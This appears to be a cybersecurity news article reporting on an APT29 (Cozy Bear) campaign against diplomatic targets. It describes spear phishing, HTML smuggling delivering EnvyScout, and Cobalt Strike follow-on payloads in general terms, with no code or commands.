Advanced Persistent Threat No.29 (APT29) A.K.A. Cozy Bear has been linked to widespread attacks targeting NATO and European Union countries.
In a report released on the 13th April 2023, by Poland’s Military Counterintelligence Service and its Computer Emergency Response Team, the Russian threat actors are said to be running an active campaign which is aimed to harvest information from diplomatic entities and foreign ministries.
Who are Cozy Bear?
Cozy Bear is the name given to the threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR).
In operation since at least 2008, the team of hackers often target government networks in Europe and NATO member countries, research institutes, and think tanks.
In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR. Victims of this campaign included multiple governments, as well as consulting, technology, and telecoms organisations in North America, Europe, Asia, and the Middle East.
Current campaign
In recent months, the threat actors have targeted diplomatic personnel using spear phishing emails impersonating various European countries’ embassies. The emails contain links to malicious websites or attachments designed to deploy malware via ISO, IMG, and ZIP files.
HTML smuggling
In other attacks, victims are lured to various websites controlled by APT29 whereby they are infected with the EnvyScout dropper via a technique known as HTML smuggling.
This attack vector utilises a technique which sees benign HTML documents used to hide malicious JavaScript blobs which are raw bytes of data which are rebuilt into file-like objects once on a victims machine. Many web-filter security tools will allow the benign HTML files through, and thus also allow the malicious JavaScript.
Cases have been seen where victims targeted with HTML smuggling have subsequently been further compromised by file downloaders designed to deliver additional malware, as well as a CobaltStrike Beacon stager named HALFRIG.
Analysis of affected devices have discovered that the downloaders were used for reconnaissance to help the attackers evaluate each target’s relevance and determine whether they were honeypots or virtual machines used for malware analysis.
If the infected device passed the verification stage, the downloaders were used to deliver and start-up COBALT STRIKE or BRUTE RATEL.
Cobalt Strike
Cobalt Strike is a widely known suite of customizable penetration testing tools.
First released in 2012, it was originally the commercial spin-off of the open-source Armitage project that added a graphical user interface (GUI) to the Metasploit framework to help security practitioners detect software vulnerabilities more quickly.
The software has also become a favorite tool of cybercriminals as an easy and cost-effective way to remotely access and manage infected systems.
The official vendor for Cobalt Strike is Fortra (Formerly Help Systems) who employ a vetting process that attempts to minimise the potential that the software will be used by those who will use it for nefarious purposes.
Cobalt Strike has been leaked and cracked multiple times over the years, with illicit versions available on the dark web for many thousands of dollars.
These unauthorized versions of Cobalt Strike are just as powerful as the legitimate retail versions with the exception that they don’t have active licenses, so they can’t be upgraded as easily.
